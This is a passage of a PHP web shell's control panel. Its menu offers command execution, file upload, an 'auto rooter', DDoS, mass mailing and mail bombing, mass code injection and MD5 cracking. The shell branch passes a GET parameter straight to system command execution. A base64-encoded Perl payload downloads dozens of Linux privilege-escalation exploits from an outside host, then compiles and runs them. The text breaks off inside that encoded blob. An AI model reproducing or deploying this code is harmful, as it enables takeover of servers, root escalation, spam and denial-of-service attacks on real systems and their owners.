 816 | Your IP : <?php getClientIp(); ?> <font color="silver" >|</font> Server IP : <?php getServerIp();?> <br />
 817 |             Safe Mode : <?php getSafeMode(); ?><br />
 818 |             <?php if($os == 'Windows'){ echo showDrives();} ?> <?php echo getcwd();?>
 819 |             </div>
 820 |             </td>
 821 |         </tr>
 822 |     </tbody>
 823 | </table>
 824 | <div class="header" id="borders">
 825 |             Server ADMIN: <?php echo $_SERVER['SERVER_ADMIN'];?> <font color="silver" >|</font>
 826 |             PHP VERSION : <?php echo $phpVersion; ?> <font color="silver" >|</font>
 827 |             Curl : <?php echo function_exists('curl_version')?("<font color='red'>Enabled</font>"):("Disabled"); ?> <font color="silver" >|</font>
 828 |             Oracle : <?php echo function_exists('ocilogon')?("<font color='red'>Enabled</font>"):("Disabled"); ?> <font color="silver" >|</font>
 829 |             MySQL : <?php  echo function_exists('mysql_connect')?("<font color='red'>Enabled</font>"):("Disabled");?> <font color="silver" >|</font>
 830 |             MSSQL : <?php echo function_exists('mssql_connect')?("<font color='red'>Enabled</font>"):("Disabled"); ?> <font color="silver" >|</font>
 831 |             PostgreSQL : <?php echo function_exists('pg_connect')?("<font color='red'>Enabled</font>"):("Disabled"); ?> <font color="silver" >|</font>
 832 |             Disable functions : <?php getDisabledFunctions(); ?> <font color="silver" >|</font>
 833 |             Space : <?php diskSpace(); ?> <font color="silver" >|</font>
 834 |             Free : <?php freeSpace(); ?>
 835 |         </table>
 836 | </div>
 837 | <div class="nav">
 838 | <ul>
 839 |     <li><a href="<?php echo $self;?>">Home</a></li>
 840 |     <li><a href="<?php echo $self.'?upload';?>">Upload</a></li>
 841 |     <li><a href="<?php echo $self.'?shell';?>">Shell</a></li>
 842 |     <li><a href="<?php echo $self.'?r00t'?>">Aut0 R00t3r (Unix/Linux)</a></li>
 843 |     <li><a href="<?php echo $self.'?dos';?>">DDoS</a></li>
 844 |     <li><a href="<?php echo $self.'?fuzz';?>">Web-Server Fuzzer</a></li>
 845 |     <li><a href="<?php echo $self.'?mail'?>">Mass Mailer</a></li>
 846 |     <li><a href="<?php echo $self.'?bomb'?>">Mail Bomber</a></li>
 847 |     <li><a href="<?php echo $self.'?connect'?>">Connect</a></li>
 848 |     <li><a href="<?php echo $self.'?injector'?>">Mass Code Injector</a></li>
 849 |     <li><a href="<?php echo $self.'?obfuscate'?>">PHP Obfuscator</a></li>
 850 |     <li><a href="<?php echo $self.'?eval'?>">PHP Evaluate</a></li>
 851 |     <li><a href="<?php echo $self.'?md5'?>">MD5 Cracker</a></li>
 852 |     <li><a href="<?php echo $self.'?gdork'?>">Google Dork Creator</a></li>
 853 | 
 854 | 
 855 |     <?php if($lock == 'on')
 856 |     {
 857 |     ?>
 858 |         <li><a href="<?php echo $self.'?logout'?>">I m Out!</a></li>
 859 |     <?php
 860 |     }
 861 |     ?>
 862 | </ul>
 863 | </div>
 864 | 
 865 | <center>
 866 | <?php
 867 | //-------------------------------- Check what he wants -------------------------------------------
 868 | 
 869 | // Shell
 870 | 
 871 | if(isset($_GET['shell']))
 872 | {
 873 |     if(!isset($_GET['cmd']) || $_GET['cmd'] == '')
 874 |     {
 875 |         $result = "";
 876 |     }
 877 |     else
 878 |     {
 879 |         $result=exec_all($_GET['cmd']);
 880 |     }
 881 |     ?>
 882 |     <textarea class="cmd" cols="100" rows="20"><?php echo $result;?></textarea><br /><br />
 883 |     <form action="<?php echo $self;?>" method="GET">
 884 |     <!-- For Shell -->
 885 |     <input name="shell" type="hidden" />
 886 |     <!-- For CMD -->
 887 |     <input name="cmd" class="cmd" />
 888 |     <input name="submit" value="Spin That Shit!" class="own" type="submit" />
 889 |     </form>
 890 |     <?php
 891 | }
 892 | 
 893 | // Auto Rooter (Linux/Unix Only!) with Perl Installed
 894 | 
 895 | else if(isset($_GET['r00t']))
 896 | {
 897 |     // Note : The Perl Auto Rooter Perl Script was originally written by iskorpitx , All credits to him for an awesome
 898 |     // Piece of code , and thanks to eXes0ul for providing me the links . ;)
 899 | 
 900 |     $r00t =
 901 | "IyEvdXNyL2Jpbi9wZXJsIA0KIyBFeHBsb2l0IHRvb2xzIHYyLjAgY29kZWQgYnkgaXNrb3JwaXR4
 902 | IChUdXJraXNoIEhhY2tlcikNCiMgbGludXggc2VydmVybGVyZGUgZ2VjZXJsaWRpcg0KIyBpeWkg
 903 | c2Fuc2xhcjopDQojIGJ5IGlza29ycGl0eA0KeyANCnN5c3RlbSgid2dldCBodHRwOi8vd2FyMTk3
 904 | MS5jb20vQ01TX0ZJTEVTL2ZpbGUvY2MvaXNrb3JwaXR4Iik7ICANCnN5c3RlbSgiY2htb2QgNzc3
 905 | IGlza29ycGl0eCIpOyANCnN5c3RlbSgiLi9pc2tvcnBpdHgiKTsgDQpzeXN0ZW0oImlkIik7IA0K
 906 | c3lzdGVtKCJ3Z2V0IGh0dHA6Ly93YXIxOTcxLmNvbS9DTVNfRklMRVMvZmlsZS9jYy80NCIpOyAg
 907 | DQpzeXN0ZW0oImNobW9kIDc3NyA0NCIpOyANCnN5c3RlbSgiLi80NCIpOyANCnN5c3RlbSgiaWQi
 908 | KTsNCnN5c3RlbSgid2dldCBodHRwOi8vd2FyMTk3MS5jb20vQ01TX0ZJTEVTL2ZpbGUvY2MvOTUy
 909 | MSIpOyAgDQpzeXN0ZW0oImNobW9kIDc3NyA5NTIxIik7IA0Kc3lzdGVtKCIuLzk1MjEiKTsgDQpz
 910 | eXN0ZW0oImlkIik7ICANCnN5c3RlbSgid2dldCBodHRwOi8vd2FyMTk3MS5jb20vQ01TX0ZJTEVT
 911 | L2ZpbGUvY2MvZnJvb3QiKTsgIA0Kc3lzdGVtKCJjaG1vZCA3NzcgZnJvb3QiKTsgDQpzeXN0ZW0o
 912 | Ii4vZnJvb3QiKTsgDQpzeXN0ZW0oImlkIik7DQpzeXN0ZW0oImlkIik7DQpzeXN0ZW0oImlkIik7
 913 | DQpzeXN0ZW0oImlkIik7DQpzeXN0ZW0oImlkIik7DQpzeXN0ZW0oIndnZXQgMjc3MDQuYyBkb3du
 914 | bG9hZHMuc2VjdXJpdHlmb2N1cy5jb20vdnVsbmVyYWJpbGl0aWVzL2V4cGxvaXRzLzI3NzA0LmMi
 915 | KTsgDQpzeXN0ZW0oImdjYyAyNzcwNC5jIC1vIDI3NzA0Iik7ICANCnN5c3RlbSgiY2htb2QgNzc3
 916 | IDI3NzA0Iik7IA0Kc3lzdGVtKCIuLzI3NzA0Iik7IA0Kc3lzdGVtKCJpZCIpOyANCnByaW50ICJJ
 917 | ZiB1IHIgcjAwdCBzdG9wIHhwbCB3aXRoIGN0cmwrY1xuIjsNCnN5c3RlbSgid2dldCBodHRwOi8v
 918 | d2FyMTk3MS5jb20vQ01TX0ZJTEVTL2ZpbGUvY2MvMTgtMS5jIik7IA0Kc3lzdGVtKCJnY2MgLVdh
 919 | bGwgLW8gMTgtMSAxOC0xLmMiKTsgDQpzeXN0ZW0oImdjYyAtV2FsbCAtbTY0IC1vIDE4LTMgMTgt
 920 | MS5jIik7IA0Kc3lzdGVtKCJjaG1vZCA3NzcgMTgtMSIpOyANCnN5c3RlbSgiY2htb2QgNzc3IDE4
 921 | LTMiKTsgDQpzeXN0ZW0oIi4vMTgtMSIpOyANCnN5c3RlbSgiaWQiKTsgDQpzeXN0ZW0oIi4vMTgt
 922 | MyIpOyANCnN5c3RlbSgiaWQiKTsgDQpwcmludCAiSWYgdSByIHIwMHQgc3RvcCB4cGwgd2l0aCBj
 923 | dHJsK2NcbiI7DQpzeXN0ZW0oIndnZXQgaHR0cDovL3dhcjE5NzEuY29tL0NNU19GSUxFUy9maWxl
 924 | L2NjLzE4LTIiKTsgIA0Kc3lzdGVtKCJjaG1vZCA3NzcgMTgtMiIpOyANCnN5c3RlbSgiLi8xOC0y
 925 | Iik7IA0Kc3lzdGVtKCJpZCIpOyANCnByaW50ICJJZiB1IHIgcjAwdCBzdG9wIHhwbCB3aXRoIGN0
 926 | cmwrY1xuIjsNCnN5c3RlbSgid2dldCBodHRwOi8vd2FyMTk3MS5jb20vQ01TX0ZJTEVTL2ZpbGUv
 927 | Y2MvMTgtMSIpOyAgDQpzeXN0ZW0oImNobW9kIDc3NyAxOC0xIik7IA0Kc3lzdGVtKCIuLzE4LTEi
 928 | KTsgDQpzeXN0ZW0oImlkIik7IA0KcHJpbnQgIklmIHUgciByMDB0IHN0b3AgeHBsIHdpdGggY3Ry
 929 | bCtjXG4iOw0Kc3lzdGVtKCJ3Z2V0IGh0dHA6Ly93YXIxOTcxLmNvbS9DTVNfRklMRVMvZmlsZS9j
 930 | Yy9ydW4iKTsgIA0Kc3lzdGVtKCJjaG1vZCA3NzcgcnVuIik7IA0Kc3lzdGVtKCIuL3J1biIpOyAN
 931 | CnN5c3RlbSgiaWQiKTsgDQpwcmludCAiSWYgdSByIHIwMHQgc3RvcCB4cGwgd2l0aCBjdHJsK2Nc
 932 | biI7DQpzeXN0ZW0oIndnZXQgaHR0cDovL3dhcjE5NzEuY29tL0NNU19GSUxFUy9maWxlL2NjL2V4
 933 | cGxvaXQuYyIpOyAgDQpwcmludCAiSWYgdSByIHIwMHQgc3RvcCB4cGwgd2l0aCBjdHJsK2NcbiI7
 934 | DQpzeXN0ZW0oIndnZXQgcnVuX2V4cGxvaXRzLnNoIHdnZXQgaHR0cDovL3dhcjE5NzEuY29tL0NN
 935 | U19GSUxFUy9maWxlL2NjL3J1bl9leHBsb2l0cy5zaCIpOyAgDQpzeXN0ZW0oImNobW9kIDc3NyBy
 936 | dW5fZXhwbG9pdHMuc2giKTsgDQpzeXN0ZW0oIi4vcnVuX2V4cGxvaXRzLnNoIik7IA0KcHJpbnQg
 937 | IklmIHUgciByMDB0IHN0b3AgeHBsIHdpdGggY3RybCtjXG4iOw0Kc3lzdGVtKCJ3Z2V0IGh0dHA6
 938 | Ly93YXIxOTcxLmNvbS9DTVNfRklMRVMvZmlsZS9jYy9leHBsb2l0Iik7ICANCnN5c3RlbSgiY2ht
 939 | b2QgNzc3IGV4cGxvaXQiKTsgDQpzeXN0ZW0oIi4vZXhwbG9pdCIpOyANCnByaW50ICJJZiB1IHIg
 940 | cjAwdCBzdG9wIHhwbCB3aXRoIGN0cmwrY1xuIjsNCnN5c3RlbSgid2dldCBodHRwOi8vd2FyMTk3
 941 | MS5jb20vQ01TX0ZJTEVTL2ZpbGUvY2MvcnVuMiIpOyAgDQpzeXN0ZW0oImNobW9kIDc3NyBydW4y
 942 | Iik7IA0Kc3lzdGVtKCIuL3J1bjIiKTsgDQpzeXN0ZW0oImlkIik7IA0Kc3lzdGVtKCJ3Z2V0IGV4
 943 | cCBodHRwOi8vd2FyMTk3MS5jb20vQ01TX0ZJTEVTL2ZpbGUvY2MvZXhwIik7ICANCnN5c3RlbSgi
 944 | Y2htb2QgNzc3IGV4cCIpOyANCnN5c3RlbSgiLi9leHAiKTsgDQpzeXN0ZW0oImlkIik7IA0Kc3lz
 945 | dGVtKCJ3Z2V0IGh0dHA6Ly93YXIxOTcxLmNvbS9DTVNfRklMRVMvZmlsZS9jYy9leHAxIik7ICAN
 946 | CnN5c3RlbSgiY2htb2QgNzc3IGV4cDEiKTsgDQpzeXN0ZW0oIi4vZXhwMSIpOyANCnN5c3RlbSgi
 947 | aWQiKTsgDQpzeXN0ZW0oIndnZXQgaHR0cDovL3dhcjE5NzEuY29tL0NNU19GSUxFUy9maWxlL2Nj
 948 | L2V4cDIiKTsgIA0Kc3lzdGVtKCJjaG1vZCA3NzcgZXhwMiIpOyANCnN5c3RlbSgiLi9leHAyIik7
 949 | IA0Kc3lzdGVtKCJpZCIpOyANCnN5c3RlbSgid2dldCBodHRwOi8vd2FyMTk3MS5jb20vQ01TX0ZJ
 950 | TEVTL2ZpbGUvY2MvZXhwMyIpOyAgDQpzeXN0ZW0oImNobW9kIDc3NyBleHAzIik7IA0Kc3lzdGVt
 951 | KCIuL2V4cDMiKTsgDQpzeXN0ZW0oImlkIik7IA0Kc3lzdGVtKCJ3Z2V0IGV4cDQgaHR0cDovL3dh
 952 | cjE5NzEuY29tL0NNU19GSUxFUy9maWxlL2NjL2V4cDQiKTsgIA0Kc3lzdGVtKCJjaG1vZCA3Nzcg
 953 | ZXhwNCIpOyANCnN5c3RlbSgiLi9leHA0Iik7IA0Kc3lzdGVtKCJpZCIpOyANCnN5c3RlbSgid2dl
 954 | dCBodHRwOi8vd2FyMTk3MS5jb20vQ01TX0ZJTEVTL2ZpbGUvY2MvZXhwNSIpOyAgDQpzeXN0ZW0o
 955 | ImNobW9kIDc3NyBleHA1Iik7IA0Kc3lzdGVtKCIuL2V4cDUiKTsgDQpzeXN0ZW0oImlkIik7IA0K
 956 | c3lzdGVtKCJ3Z2V0IGh0dHA6Ly93YXIxOTcxLmNvbS9DTVNfRklMRVMvZmlsZS9jYy9leHA2Iik7
 957 | ICANCnN5c3RlbSgiY2htb2QgNzc3IGV4cDYiKTsgDQpzeXN0ZW0oIi4vZXhwNiIpOyANCnN5c3Rl
 958 | bSgiaWQiKTsgDQpzeXN0ZW0oIndnZXQgaHR0cDovL3dhcjE5NzEuY29tL0NNU19GSUxFUy9maWxl
 959 | L2NjL2V4cDciKTsgIA0Kc3lzdGVtKCJjaG1vZCA3NzcgZXhwNyIpOyANCnN5c3RlbSgiLi9leHA3
 960 | Iik7IA0Kc3lzdGVtKCJpZCIpOyANCnN5c3RlbSgid2dldCBodHRwOi8vd2FyMTk3MS5jb20vQ01T
 961 | X0ZJTEVTL2ZpbGUvY2MvZXhwOCIpOyAgDQpzeXN0ZW0oImNobW9kIDc3NyBleHA4Iik7IA0Kc3lz
 962 | dGVtKCIuL2V4cDgiKTsgDQpzeXN0ZW0oImlkIik7IA0Kc3lzdGVtKCJ3Z2V0IGh0dHA6Ly93YXIx
 963 | OTcxLmNvbS9DTVNfRklMRVMvZmlsZS9jYy9leHA5Iik7ICANCnN5c3RlbSgiY2htb2QgNzc3IGV4
 964 | cDkiKTsgDQpzeXN0ZW0oIi4vZXhwOSIpOyANCnN5c3RlbSgiaWQiKTsgDQpwcmludCAiSWYgdSBy
 965 | IHIwMHQgc3RvcCB4cGwgd2l0aCBjdHJsK2NcbiI7DQpzeXN0ZW0oIndnZXQgaHR0cDovL3dhcjE5
 966 | NzEuY29tL0NNU19GSUxFUy9maWxlL2NjL3J1bjIiKTsgIA0Kc3lzdGVtKCJjaG1vZCA3NzcgcnVu
 967 | MiIpOyANCnN5c3RlbSgiLi9ydW4yIik7IA0Kc3lzdGVtKCJpZCIpOyANCnByaW50ICJJZiB1IHIg
 968 | cjAwdCBzdG9wIHhwbCB3aXRoIGN0cmwrY1xuIjsNCnN5c3RlbSgid2dldCBodHRwOi8vd2FyMTk3
 969 | MS5jb20vQ01TX0ZJTEVTL2ZpbGUvY2MvcnVuMiIpOyAgDQpzeXN0ZW0oImNobW9kIDc3NyBydW4y
 970 | Iik7IA0Kc3lzdGVtKCIuL3J1bjIiKTsgDQpzeXN0ZW0oImlkIik7IA0KcHJpbnQgIklmIHUgciBy
 971 | MDB0IHN0b3AgeHBsIHdpdGggY3RybCtjXG4iOw0Kc3lzdGVtKCJ3Z2V0IGh0dHA6Ly93YXIxOTcx
 972 | LmNvbS9DTVNfRklMRVMvZmlsZS9jYy9leHBsb2l0Iik7ICANCnN5c3RlbSgiY2htb2QgNzc3IGV4
 973 | cGxvaXQiKTsgDQpzeXN0ZW0oIi4vZXhwbG9pdCIpOyANCnN5c3RlbSgiaWQiKTsgDQpwcmludCAi
 974 | SWYgdSByIHIwMHQgc3RvcCB4cGwgd2l0aCBjdHJsK2NcbiI7DQpzeXN0ZW0oIndnZXQgaHR0cDov
 975 | L3dhcjE5NzEuY29tL0NNU19GSUxFUy9maWxlL2NjL2V4cGxvaXQyIik7ICANCnN5c3RlbSgiY2ht
 976 | b2QgNzc3IGV4cGxvaXQyIik7IA0Kc3lzdGVtKCIuL2V4cGxvaXQyIik7IA0Kc3lzdGVtKCJpZCIp
 977 | OyANCnByaW50ICJJZiB1IHIgcjAwdCBzdG9wIHhwbCB3aXRoIGN0cmwrY1xuIjsNCnN5c3RlbSgi
 978 | d2dldCBodHRwOi8vd2FyMTk3MS5jb20vQ01TX0ZJTEVTL2ZpbGUvY2MvZXhwbG9pdDIiKTsgIA0K
 979 | c3lzdGVtKCJjaG1vZCA3NzcgZXhwbG9pdDIiKTsgDQpzeXN0ZW0oIi4vZXhwbG9pdDIiKTsgDQpz
 980 | eXN0ZW0oImlkIik7IA0KcHJpbnQgIklmIHUgciByMDB0IHN0b3AgeHBsIHdpdGggY3RybCtjXG4i
 981 | Ow0Kc3lzdGVtKCJ3Z2V0IGh0dHA6Ly93YXIxOTcxLmNvbS9DTVNfRklMRVMvZmlsZS9jYy9ydW4y
 982 | Iik7ICANCnN5c3RlbSgiY2htb2QgNzc3IHJ1bjIiKTsgDQpzeXN0ZW0oIi4vcnVuMiIpOyANCnN5
 983 | c3RlbSgiaWQiKTsgDQpwcmludCAiSWYgdSByIHIwMHQgc3RvcCB4cGwgd2l0aCBjdHJsK2NcbiI7
 984 | DQpzeXN0ZW0oIndnZXQgaHR0cDovL3dhcjE5NzEuY29tL0NNU19GSUxFUy9maWxlL2NjLzIwMDkt
 985 | MSIpOyAgDQpzeXN0ZW0oImNobW9kIDc3NyAyMDA5LTEiKTsgDQpzeXN0ZW0oIi4vMjAwOS0xIik7
 986 | IA0Kc3lzdGVtKCJpZCIpOyANCnByaW50ICJJZiB1IHIgcjAwdCBzdG9wIHhwbCB3aXRoIGN0cmwr
 987 | Y1xuIjsNCnN5c3RlbSgid2dldCBodHRwOi8vd2FyMTk3MS5jb20vQ01TX0ZJTEVTL2ZpbGUvY2Mv
 988 | ZGVybGUuYyIpOyANCnN5c3RlbSgiZ2NjIGRlcmxlLmMgLW8gZGVybGUiKTsgIA0Kc3lzdGVtKCJj
 989 | aG1vZCA3NzcgZGVybGUiKTsgDQpzeXN0ZW0oIi4vZGVybGUiKTsgDQpzeXN0ZW0oImlkIik7IA0K
 990 | cHJpbnQgIklmIHUgciByMDB0IHN0b3AgeHBsIHdpdGggY3RybCtjXG4iOw0Kc3lzdGVtKCJ3Z2V0
 991 | IGh0dHA6Ly93YXIxOTcxLmNvbS9DTVNfRklMRVMvZmlsZS9jYy8zLmMiKTsgDQpzeXN0ZW0oImdj
 992 | YyAzLmMgLW8gMyIpOyAgDQpzeXN0ZW0oImNobW9kIDc3NyAzIik7IA0Kc3lzdGVtKCIuLzMiKTsg
 993 | DQpzeXN0ZW0oImlkIik7IA0KcHJpbnQgIklmIHUgciByMDB0IHN0b3AgeHBsIHdpdGggY3RybCtj
 994 | XG4iOw0Kc3lzdGVtKCJ3Z2V0IGh0dHA6Ly93YXIxOTcxLmNvbS9DTVNfRklMRVMvZmlsZS9jYy8z
 995 | YSIpOyANCnN5c3RlbSgiY2htb2QgNzc3IDNhIik7IA0Kc3lzdGVtKCIuLzNhIik7IA0Kc3lzdGVt
 996 | KCJpZCIpOyANCnByaW50ICJJZiB1IHIgcjAwdCBzdG9wIHhwbCB3aXRoIGN0cmwrY1xuIjsNCnN5
 997 | c3RlbSgid2dldCBodHRwOi8vd2FyMTk3MS5jb20vQ01TX0ZJTEVTL2ZpbGUvY2MvNC5jIik7IA0K
 998 | c3lzdGVtKCJnY2MgNC5jIC1vIDQiKTsgIA0Kc3lzdGVtKCJjaG1vZCA3NzcgNCIpOyANCnN5c3Rl
 999 | bSgiLi80Iik7IA0Kc3lzdGVtKCJpZCIpOyANCnByaW50ICJJZiB1IHIgcjAwdCBzdG9wIHhwbCB3
1000 | aXRoIGN0cmwrY1xuIjsNCnN5c3RlbSgid2dldCBodHRwOi8vd2FyMTk3MS5jb20vQ01TX0ZJTEVT
1001 | L2ZpbGUvY2MvNGEiKTsgDQpzeXN0ZW0oImNobW9kIDc3NyA0YSIpOyANCnN5c3RlbSgiLi80YSIp
1002 | OyANCnN5c3RlbSgiaWQiKTsgDQpwcmludCAiSWYgdSByIHIwMHQgc3RvcCB4cGwgd2l0aCBjdHJs
1003 | K2NcbiI7IA0Kc3lzdGVtKCJ3Z2V0IGh0dHA6Ly93YXIxOTcxLmNvbS9DTVNfRklMRVMvZmlsZS9j
1004 | Yy9jeC5jIik7IA0Kc3lzdGVtKCJnY2MgY3guYyAtbyBjeCIpOyAgDQpzeXN0ZW0oImNobW9kIDc3
1005 | NyBjeCIpOyANCnN5c3RlbSgiLi9jeCIpOyANCnN5c3RlbSgiaWQiKTsgDQpwcmludCAiSWYgdSBy
1006 | IHIwMHQgc3RvcCB4cGwgd2l0aCBjdHJsK2NcbiI7IA0Kc3lzdGVtKCJ3Z2V0IGh0dHA6Ly93YXIx
1007 | OTcxLmNvbS9DTVNfRklMRVMvZmlsZS9jYy9jeHguYyIpOyANCnN5c3RlbSgiZ2NjIGN4eC5jLSBv
1008 | IGN4eCIpOyAgDQpzeXN0ZW0oImNobW9kIDc3NyBjeHgiKTsgDQpzeXN0ZW0oIi4vY3h4Iik7IA0K
1009 | c3lzdGVtKCJpZCIpOyANCnByaW50ICJJZiB1IHIgcjAwdCBzdG9wIHhwbCB3aXRoIGN0cmwrY1xu
1010 | IjsgDQpzeXN0ZW0oIndnZXQgaHR0cDovL3dhcjE5NzEuY29tL0NNU19GSUxFUy9maWxlL2NjL2V4
1011 | cGxvaXQyIik7IA0Kc3lzdGVtKCJjaG1vZCA3NzcgZXhwbG9pdDIiKTsgDQpzeXN0ZW0oIi4vZXhw
1012 | bG9pdDIiKTsgDQpzeXN0ZW0oImlkIik7IA0KcHJpbnQgIklmIHUgciByMDB0IHN0b3AgeHBsIHdp
1013 | dGggY3RybCtjXG4iOyANCnN5c3RlbSgid2dldCBydW4gaHR0cDovL3dhcjE5NzEuY29tL0NNU19G
1014 | SUxFUy9maWxlL2NjL3J1biIpOyANCnN5c3RlbSgiY2htb2QgNzc3IHJ1biIpOyANCnN5c3RlbSgi
1015 | Li9ydW4iKTsgDQpzeXN0ZW0oImlkIik7IA0KcHJpbnQgIklmIHUgciByMDB0IHN0b3AgeHBsIHdp
1016 | dGggY3RybCtjXG4iOyANCnN5c3RlbSgid2dldCBodHRwOi8vd2FyMTk3MS5jb20vQ01TX0ZJTEVT
1017 | L2ZpbGUvY2MvcnVuLnNoIik7ICANCnN5c3RlbSgiY2htb2QgNzc3IHJ1bi5zaCIpOyANCnN5c3Rl
1018 | bSgiLi9ydW4uc2giKTsgDQpzeXN0ZW0oImlkIik7IA0KcHJpbnQgIklmIHUgciByMDB0IHN0b3Ag
1019 | eHBsIHdpdGggY3RybCtjXG4iOw0Kc3lzdGVtKCJ3Z2V0IGh0dHA6Ly93YXIxOTcxLmNvbS9DTVNf
1020 | RklMRVMvZmlsZS9jYy8yOS5jIik7IA0Kc3lzdGVtKCJnY2MgMjkuYyAtbyAyOSIpOyAgDQpzeXN0
1021 | ZW0oImNobW9kIDc3NyAyOSIpOyANCnN5c3RlbSgiLi8yOSIpOyANCnN5c3RlbSgiaWQiKTsgDQpw
1022 | cmludCAiSWYgdSByIHIwMHQgc3RvcCB4cGwgd2l0aCBjdHJsK2NcbiI7DQpzeXN0ZW0oImh0dHA6
1023 | Ly93YXIxOTcxLmNvbS9DTVNfRklMRVMvZmlsZS9jYy8zMCIpOyAgDQpzeXN0ZW0oImNobW9kIDc3
1024 | NyAzMCIpOyANCnN5c3RlbSgiLi8zMCIpOyANCnN5c3RlbSgiaWQiKTsgDQpwcmludCAiSWYgdSBy
1025 | IHIwMHQgc3RvcCB4cGwgd2l0aCBjdHJsK2NcbiI7DQpzeXN0ZW0oIndnZXQgaHR0cDovL3dhcjE5
1026 | NzEuY29tL0NNU19GSUxFUy9maWxlL2NjLzIwMDkiKTsgIA0Kc3lzdGVtKCJjaG1vZCA3NzcgMjAw
1027 | OSIpOyANCnN5c3RlbSgiLi8yMDA5Iik7IA0Kc3lzdGVtKCJpZCIpOyANCnByaW50ICJJZiB1IHIg
1028 | cjAwdCBzdG9wIHhwbCB3aXRoIGN0cmwrY1xuIjsNCnN5c3RlbSgid2dldCBodHRwOi8vd2FyMTk3
1029 | MS5jb20vQ01TX0ZJTEVTL2ZpbGUvY2MvaXNrb3JwaXR4Iik7ICANCnN5c3RlbSgiY2htb2QgNzc3
1030 | IGlza29ycGl0eCIpOyANCnN5c3RlbSgiLi9pc2tvcnBpdHgiKTsgDQpzeXN0ZW0oImlkIik7IA0K
1031 | cHJpbnQgIklmIHUgciByMDB0IHN0b3AgeHBsIHdpdGggY3RybCtjXG4iOw0Kc3lzdGVtKCJ3Z2V0
1032 | IGh0dHA6Ly93YXIxOTcxLmNvbS9DTVNfRklMRVMvZmlsZS9jYy9jIik7ICANCnN5c3RlbSgiY2ht
1033 | b2QgNzc3IGMiKTsgDQpzeXN0ZW0oIi4vYyIpOyANCnN5c3RlbSgiaWQiKTsgDQpwcmludCAiSWYg
1034 | dSByIHIwMHQgc3RvcCB4cGwgd2l0aCBjdHJsK2NcbiI7DQpzeXN0ZW0oIndnZXQgaHR0cDovL3dh
1035 | cjE5NzEuY29tL0NNU19GSUxFUy9maWxlL2NjL2N4Iik7ICANCnN5c3RlbSgiY2htb2QgNzc3IGN4
1036 | Iik7IA0Kc3lzdGVtKCIuL2N4Iik7IA0Kc3lzdGVtKCJpZCIpOyANCnByaW50ICJJZiB1IHIgcjAw
1037 | dCBzdG9wIHhwbCB3aXRoIGN0cmwrY1xuIjsNCnN5c3RlbSgid2dldCBodHRwOi8vd2FyMTk3MS5j
1038 | b20vQ01TX0ZJTEVTL2ZpbGUvY2MvZGVybGUyIik7ICANCnN5c3RlbSgiY2htb2QgNzc3IGRlcmxl
1039 | MiIpOyANCnN5c3RlbSgiLi9kZXJsZTIiKTsgDQpzeXN0ZW0oImlkIik7IA0KcHJpbnQgIklmIHUg
1040 | ciByMDB0IHN0b3AgeHBsIHdpdGggY3RybCtjXG4iOw0Kc3lzdGVtKCJ3Z2V0IGh0dHA6Ly93YXIx
1041 | OTcxLmNvbS9DTVNfRklMRVMvZmlsZS9jYy9kZXJsZSIpOyAgDQpzeXN0ZW0oImNobW9kIDc3NyBk
1042 | ZXJsZSIpOyANCnN5c3RlbSgiLi9kZXJsZSIpOyANCnN5c3RlbSgiaWQiKTsgDQpwcmludCAiSWYg
1043 | dSByIHIwMHQgc3RvcCB4cGwgd2l0aCBjdHJsK2NcbiI7DQpzeXN0ZW0oIndnZXQgaHR0cDovL3dh
1044 | cjE5NzEuY29tL0NNU19GSUxFUy9maWxlL2NjLzZ4LmMiKTsgIA0Kc3lzdGVtKCJnY2MgNnguYyAt
1045 | byA2eGEiKTsgDQpzeXN0ZW0oIi4vNnhhIik7IA0Kc3lzdGVtKCJpZCIpOyANCnByaW50ICJJZiB1
1046 | IHIgcjAwdCBzdG9wIHhwbCB3aXRoIGN0cmwrY1xuIjsNCnN5c3RlbSgid2dldCBodHRwOi8vd2Fy
1047 | MTk3MS5jb20vQ01TX0ZJTEVTL2ZpbGUvY2MvNngiKTsgIA0Kc3lzdGVtKCJjaG1vZCA3NzcgNngi
1048 | KTsgDQpzeXN0ZW0oIi4vNngiKTsgDQpzeXN0ZW0oImlkIik7IA0KcHJpbnQgIklmIHUgciByMDB0
1049 | IHN0b3AgeHBsIHdpdGggY3RybCtjXG4iOw0Kc3lzdGVtKCJ3Z2V0IGh0dHA6Ly93YXIxOTcxLmNv
1050 | bS9DTVNfRklMRVMvZmlsZS9jYy82YiIpOyAgDQpzeXN0ZW0oImNobW9kIDc3NyA2YiIpOyANCnN5
1051 | c3RlbSgiLi82YiIpOyANCnN5c3RlbSgiaWQiKTsgDQpwcmludCAiSWYgdSByIHIwMHQgc3RvcCB4
1052 | cGwgd2l0aCBjdHJsK2NcbiI7DQpzeXN0ZW0oIndnZXQgaHR0cDovL3dhcjE5NzEuY29tL0NNU19G
1053 | SUxFUy9maWxlL2NjLzZ4eCIpOyAgDQpzeXN0ZW0oImNobW9kIDc3NyA2eHgiKTsgDQpzeXN0ZW0o
1054 | Ii4vNnh4Iik7IA0Kc3lzdGVtKCJpZCIpOyANCnByaW50ICJJZiB1IHIgcjAwdCBzdG9wIHhwbCB3
1055 | aXRoIGN0cmwrY1xuIjsNCnN5c3RlbSgid2dldCBodHRwOi8vd2FyMTk3MS5jb20vQ01TX0ZJTEVT
1056 | L2ZpbGUvY2MvMjc3MDQiKTsgIA0Kc3lzdGVtKCJjaG1vZCA3NzcgMjc3MDQiKTsgDQpzeXN0ZW0o
1057 | Ii4vMjc3MDQiKTsgDQpzeXN0ZW0oImlkIik7IA0KcHJpbnQgIklmIHUgciByMDB0IHN0b3AgeHBs
1058 | IHdpdGggY3RybCtjXG4iOw0Kc3lzdGVtKCJ3Z2V0IGh0dHA6Ly93YXIxOTcxLmNvbS9DTVNfRklM
1059 | RVMvZmlsZS9jYy9kZXJsZTIuYyIpOyANCnN5c3RlbSgiZ2NjIGRlcmxlMi5jIC1vIGRlcmxlMiIp
1060 | OyAgDQpzeXN0ZW0oImNobW9kIDc3NyBkZXJsZTIiKTsgDQpzeXN0ZW0oIi4vZGVybGUyIik7IA0K
1061 | c3lzdGVtKCJpZCIpOyANCnByaW50ICJJZiB1IHIgcjAwdCBzdG9wIHhwbCB3aXRoIGN0cmwrY1xu
1062 | IjsNCnN5c3RlbSgid2dldCBodHRwOi8vd2FyMTk3MS5jb20vQ01TX0ZJTEVTL2ZpbGUvY2MvZGVy
1063 | bGUyIik7IA0Kc3lzdGVtKCJjaG1vZCA3NzcgZGVybGUyIik7IA0Kc3lzdGVtKCIuL2RlcmxlMiIp
1064 | OyANCnN5c3RlbSgiaWQiKTsgDQpwcmludCAiSWYgdSByIHIwMHQgc3RvcCB4cGwgd2l0aCBjdHJs
